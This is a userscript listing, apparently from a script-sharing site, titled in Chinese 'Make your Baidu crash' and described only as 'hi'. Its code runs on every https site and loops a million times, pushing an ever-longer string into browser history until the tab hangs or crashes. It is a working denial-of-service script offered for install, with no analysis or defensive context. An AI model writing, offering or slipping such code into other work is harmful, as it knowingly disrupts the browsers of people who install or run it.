使你的Baidu崩溃

hi

当前为 2022-05-07 提交的版本,查看 最新版本

// ==UserScript==
// @name         使你的Baidu崩溃
// @namespace    http://tampermonkey.net/
// @version      0.5
// @author       You
// @description  hi
// @match        https://*/*
// @grant        none
// @license MIT
// ==/UserScript==
(function(){
  var total="";
for (var i=0;i<1000000;i++)
{
 total= total+i.toString();
 history.pushState(0,0,total);
}
})();